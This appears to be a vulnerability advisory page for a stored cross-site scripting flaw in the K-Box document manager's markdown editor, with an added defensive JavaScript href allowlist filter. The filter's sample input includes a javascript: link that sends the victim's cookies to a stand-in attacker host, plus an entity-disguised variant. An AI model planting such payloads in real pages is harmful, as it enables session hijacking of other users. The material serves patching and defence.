Vulnerability Description
K-Box is a web-based application to manage documents, images, videos and geodata. Prior to version 0.33.1, a stored cross-site scripting (XSS) vulnerability is present in the markdown editor used by the document abstract and by the markdown file preview. A specially crafted anchor link stored in either place can, when another user clicks it, execute attacker-controlled JavaScript in that user's browser, for example to read the user's cookies. Because the payload is stored server-side, it reaches every user who later views the abstract or preview, although exploitation still requires the victim to click the link. Version 0.33.1 includes a patch that allows unsafe links to be discarded.
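The following is an added example and is not code from K-Box or from its patch. It shows the kind of scheme allowlist a markdown link renderer applies so that a stored `javascript:` anchor is discarded before it reaches the DOM, and it goes slightly beyond the advisory text by also handling the HTML-entity and whitespace tricks attackers use to disguise the scheme. The function names, the allowlist, and the sample abstract are hypothetical, and the toy renderer only handles the plain `[text](href)` link form.

```javascript
// Added example, not K-Box code: allowlist-based href filtering for a markdown
// link renderer, the kind of check that turns a stored "javascript:" anchor
// into an inert link. All names and the sample text below are hypothetical.

const SAFE_SCHEMES = new Set(["http", "https", "mailto", "ftp"]);

// Turn a decoded code point into a string, ignoring values outside Unicode.
function fromCodePoint(n) {
  return n <= 0x10ffff ? String.fromCodePoint(n) : "";
}

// Normalise an href the way a browser will before it resolves the scheme:
// decode HTML entities an attacker may use to disguise "javascript:", strip
// ASCII control characters and spaces (browsers drop leading/trailing controls
// and every embedded tab/LF/CR), then lower-case for comparison. Stripping a
// little more than a browser does can only cause a false rejection, never a
// missed "javascript:" scheme.
function normalizeHref(raw) {
  const decoded = String(raw)
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => fromCodePoint(parseInt(d, 10)))
    .replace(/&colon;/gi, ":")
    .replace(/&tab;/gi, "\t")
    .replace(/&newline;/gi, "\n");
  return decoded.replace(/[\u0000-\u0020]/g, "").toLowerCase();
}

// A link is safe only if it has no scheme (relative URL, fragment or
// protocol-relative "//host") or a scheme on the allowlist. "javascript:",
// "data:" and "vbscript:" are rejected without having to be named.
function isSafeHref(raw) {
  const m = normalizeHref(raw).match(/^([a-z][a-z0-9+.-]*):/);
  return m === null || SAFE_SCHEMES.has(m[1]);
}

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Toy renderer for the plain [text](href) markdown link form. Links that fail
// the check keep their visible text but lose the href entirely, so there is
// nothing for a victim to click.
function renderLinks(markdown) {
  return markdown.replace(/\[([^\]]*)\]\(([^)\s]*)\)/g, (_, text, href) => {
    if (!isSafeHref(href)) {
      return `<span class="unsafe-link">${escapeHtml(text)}</span>`;
    }
    return `<a href="${escapeHtml(href)}" rel="noopener noreferrer">${escapeHtml(text)}</a>`;
  });
}

// Constructed document abstract mixing legitimate links with two disguised
// javascript: anchors of the kind the advisory describes.
const SAMPLE_ABSTRACT = [
  "See the [project page](https://example.org/docs) for details.",
  "[Click me](javascript:document.location='https://attacker.example/?c='+document.cookie)",
  "[Also me](JavaScript&colon;alert%28document.cookie%29)",
  "[Report](/files/report.pdf) and [contact](mailto:ops@example.org)",
].join("\n");

console.log(renderLinks(SAMPLE_ABSTRACT));
```

Run with `node`. The decision is made on the normalised scheme against an allowlist rather than on a denylist of `javascript:` strings, because a denylist is defeated by case changes, embedded tab or newline characters, and entity-encoded characters that the browser decodes before it resolves the URL. In a real renderer the same check belongs on image sources and on any raw HTML the editor lets through, not only on markdown links.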
CVSS Score
MEDIUM (base score 6.1)
Affected Products
| Vendor | Product | Versions |
|---|---|---|
| K-Link | K-Box | < 0.33.1 |
Related Weaknesses (CWE)
References
- https://github.com/k-box/k-box/commit/3bb4df9a4d01aade5bffaa603a514d1a5fabd214 (Patch, Third Party Advisory)
- https://github.com/k-box/k-box/security/advisories/GHSA-wwcw-h4mf-mvxf (Third Party Advisory)
FAQ
What is CVE-2022-23637?
CVE-2022-23637 is a stored cross-site scripting (XSS) vulnerability in K-Box, a web-based application to manage documents, images, videos and geodata, with a CVSS base score of 6.1 (MEDIUM). Prior to version 0.33.1, the markdown editor used by the document abstract and the markdown file preview accepts a crafted anchor link that, when clicked, runs attacker-supplied JavaScript in the victim's browser, for example to read the user's cookies.
How severe is CVE-2022-23637?
CVE-2022-23637 has been rated MEDIUM with a CVSS base score of 6.1/10. This page lists only the base score and rating; the full CVSS vector is in the GitHub security advisory linked in the references. Exploitation requires a victim to click the stored link, but the script then runs in the victim's session, so it can read cookies or act within the application as that user.
Is there a patch for CVE-2022-23637?
Yes. K-Box 0.33.1 fixes the issue by allowing unsafe links in the markdown editor to be discarded; the fixing commit and the GitHub security advisory are listed in the references above. The affected product is K-Link K-Box in versions before 0.33.1, so upgrade to 0.33.1 or later.